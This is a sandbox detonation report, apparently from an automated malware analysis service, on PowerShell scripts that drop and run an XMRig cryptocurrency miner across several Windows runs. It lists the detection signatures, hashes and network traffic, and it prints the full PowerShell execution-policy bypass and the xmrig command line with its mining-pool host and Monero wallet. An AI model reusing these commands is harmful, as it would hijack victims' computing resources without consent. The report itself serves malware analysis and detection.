| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1336 wrote to memory of 4888 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1336 wrote to memory of 4888 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1336-0-0x00007FFD77043000-0x00007FFD77045000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqm3fzmu.weh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1336-9-0x00000137F9550000-0x00000137F9572000-memory.dmp
memory/1336-10-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-11-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-12-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-13-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-16-0x00000137F95C0000-0x00000137F95CA000-memory.dmp
memory/1336-15-0x00000137F95D0000-0x00000137F95E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4888-47-0x0000026B3AE90000-0x0000026B3AEB0000-memory.dmp
memory/1336-48-0x00007FFD77043000-0x00007FFD77045000-memory.dmp
memory/4888-50-0x0000026B3AEE0000-0x0000026B3AF00000-memory.dmp
memory/1336-49-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-51-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/4888-52-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-53-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-55-0x0000026B3AF20000-0x0000026B3AF40000-memory.dmp
memory/4888-54-0x0000026B3AF00000-0x0000026B3AF20000-memory.dmp
memory/4888-56-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-58-0x0000026B3AF00000-0x0000026B3AF20000-memory.dmp
memory/4888-57-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-59-0x0000026B3AF20000-0x0000026B3AF40000-memory.dmp
memory/4888-60-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-61-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-62-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-63-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-64-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-65-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-66-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-67-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-68-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-69-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-70-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-71-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-72-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-73-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-74-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-75-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-76-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-77-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-78-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-79-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-80-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-81-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-82-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
297s
Max time network
254s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2468 wrote to memory of 2760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2468 wrote to memory of 2760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4116,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.144:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 144.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/2468-0-0x00007FFE9FFB3000-0x00007FFE9FFB5000-memory.dmp
memory/2468-1-0x00000213D5DD0000-0x00000213D5DF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snaaduzr.wcb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2468-11-0x00007FFE9FFB0000-0x00007FFEA0A71000-memory.dmp
memory/2468-12-0x00007FFE9FFB0000-0x00007FFEA0A71000-memory.dmp
memory/2468-14-0x00007FFE9FFB0000-0x00007FFEA0A71000-memory.dmp
memory/2468-15-0x00000213F0920000-0x00000213F0932000-memory.dmp
memory/2468-16-0x00000213F0910000-0x00000213F091A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2760-47-0x00000189AB3D0000-0x00000189AB3F0000-memory.dmp
memory/2760-48-0x0000018A3F280000-0x0000018A3F2A0000-memory.dmp
memory/2468-50-0x00007FFE9FFB3000-0x00007FFE9FFB5000-memory.dmp
memory/2468-51-0x00007FFE9FFB0000-0x00007FFEA0A71000-memory.dmp
memory/2760-49-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-54-0x0000018A3F8D0000-0x0000018A3F8F0000-memory.dmp
memory/2760-52-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-53-0x0000018A3F8F0000-0x0000018A3F910000-memory.dmp
memory/2760-55-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2468-56-0x00007FFE9FFB0000-0x00007FFEA0A71000-memory.dmp
memory/2760-57-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-59-0x0000018A3F8D0000-0x0000018A3F8F0000-memory.dmp
memory/2760-58-0x0000018A3F8F0000-0x0000018A3F910000-memory.dmp
memory/2760-60-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-61-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-62-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-63-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-64-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-65-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-66-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-67-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-68-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-69-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-70-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-71-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-72-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-73-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-74-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-75-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-76-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-77-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-78-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-79-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-80-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-81-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-82-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
memory/2760-83-0x00007FF602F50000-0x00007FF603B83000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
293s
Max time network
307s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2252 wrote to memory of 5088 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2252 wrote to memory of 5088 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4160 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.183.117.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.187.202:443 | chromewebstore.googleapis.com | tcp |
| GB | 142.250.187.202:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
Files
memory/2252-0-0x00007FF894143000-0x00007FF894145000-memory.dmp
memory/2252-1-0x0000025F0A0A0000-0x0000025F0A0C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1rqknnk.dat.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2252-11-0x00007FF894140000-0x00007FF894C01000-memory.dmp
memory/2252-12-0x00007FF894140000-0x00007FF894C01000-memory.dmp
memory/2252-13-0x00007FF894140000-0x00007FF894C01000-memory.dmp
memory/2252-14-0x00007FF894143000-0x00007FF894145000-memory.dmp
memory/2252-15-0x00007FF894140000-0x00007FF894C01000-memory.dmp
memory/2252-16-0x00007FF894140000-0x00007FF894C01000-memory.dmp
memory/2252-17-0x00007FF894140000-0x00007FF894C01000-memory.dmp
memory/2252-19-0x0000025F0A280000-0x0000025F0A292000-memory.dmp
memory/2252-20-0x0000025F0A110000-0x0000025F0A11A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5088-51-0x000002D68A4E0000-0x000002D68A500000-memory.dmp
memory/5088-52-0x000002D68A530000-0x000002D68A550000-memory.dmp
memory/5088-53-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-54-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-56-0x000002D68A570000-0x000002D68A590000-memory.dmp
memory/5088-55-0x000002D68A550000-0x000002D68A570000-memory.dmp
memory/5088-57-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-58-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-60-0x000002D68A570000-0x000002D68A590000-memory.dmp
memory/5088-59-0x000002D68A550000-0x000002D68A570000-memory.dmp
memory/5088-61-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-62-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-63-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-64-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-65-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-66-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-67-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-68-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-69-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-70-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-71-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-72-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-73-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-74-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-75-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-76-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-77-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-78-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-79-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-80-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
memory/5088-81-0x00007FF7D0170000-0x00007FF7D0DA3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
298s
Max time network
299s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
